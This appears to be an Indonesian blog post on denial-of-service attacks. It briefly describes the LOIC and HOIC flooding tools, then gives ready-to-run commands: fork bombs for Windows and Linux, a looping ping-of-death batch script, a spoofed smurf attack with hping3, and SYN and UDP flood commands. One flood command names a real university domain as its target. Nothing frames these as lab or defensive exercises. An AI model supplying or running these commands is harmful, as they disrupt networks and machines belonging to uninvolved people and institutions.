Security

Aplikasi DoS

Di bawah ini akan dilakukan teknik penyerangan dengan menggunakan denial of service.

Definisi DoS sendiri dapat di baca pada artikel ini

Low Orbit Ion Cannon

Low Orbit Ion Cannon adalah satu jenis aplikasi yang bersifat open source yang digunakan untuk

Meriam Ion Orbit Rendah - Wikipedia

LOIC melakukan serangan DoS secara individu atau dapat digunakan oleh banyak individu atau yang lebih dikenal dengan serangan DDoS, dilakukan pada situs target dengan membanjiri server dengan paket TCP, UDP, atau HTTP dengan tujuan mengganggu layanan host tertentu. Selain itu LOIC dapat menggunakan botnet untuk mengganggu korbannya.

High Orbit Ion Cannon

High Orbit Ion Cannon adalah aplikasi yang digunakan untuk melakukan pengujian jaringan yang bersifat opensource dan aplikasi inidirancang untuk menyerang sebanyak 256 URL pada saat yang bersamaan.

What is the High Orbit Ion Cannon | Acunetix

Fork bomb

Fork bomb dikenal dengan virus rabbit atau wabbit, merupakan jenis serangan DoS di mana sebuah proses terus mereplikasi dirinya sendiri untuk menghabiskan sumber daya sistem yang tersedia, memperlambat atau merusak sistem karena kekurangan sumber daya.

Untuk windows cukup menuliskan di notepad kemudian di simpan dalam .bat

%0|%0

Untuk Linux dituliskan pada terminal

:() { :|:& };:

Ping of Death

Untuk windows cukup menuliskan di notepad kemudian di simpan dalam .bat

:loop
ping <ip target> -l 65500 -w 1 -n 1
goto :loop

Smurf Attack

Smurf attack adalah sebuah serangan yang dibangun dengan menggunakan pemalsuan terhadap paket-paket ICMP echo request, yakni sebuah jenis paket yang digunakan oleh utilitas troubleshooting jaringan, PING. Si penyerang akan memulai serangan dengan membuat paket-paket “ICMP echo request” dengan alamat IP sumber berisi alamat IP host target yang akan diserang (berarti alamat telah dipalsukan atau telah terjadi address spoofing).

hping3 –icmp -c l –spoof <ip target> <ip broadcast>

ping 192.168.1.255 -b

Pada komputer target akan didapatkan hasil, IP penyerang akan selalu berubah-ubah setiap waktu

Simple DoS

hping3 -S –flood -V -p 80 192.168.1.9

-S: specifies SYN packets.
–flood: shoot at discretion, replies will be ignored (that’s why replies wont be shown) and packets will be sent fast as possible.
-V: Verbosity.
-p 80: port 80, you can replace this number for the service you want to attack.
170.155.9.185: target IP.

Flood using random:

hping3 telkomuniversity.ac.id -q -n -d 120 -S -p 80 –flood –rand-source

telkomuniversity.ac.id: is the target
-q: brief output
-n: show target IP instead of host.
-d 120: set packet size
–rand-source: hide IP address.

Flood using UDP

hping3 -q -n -a 25.25.25.25 –udp -s 80 –keep -p 445 –flood 192.168.1.9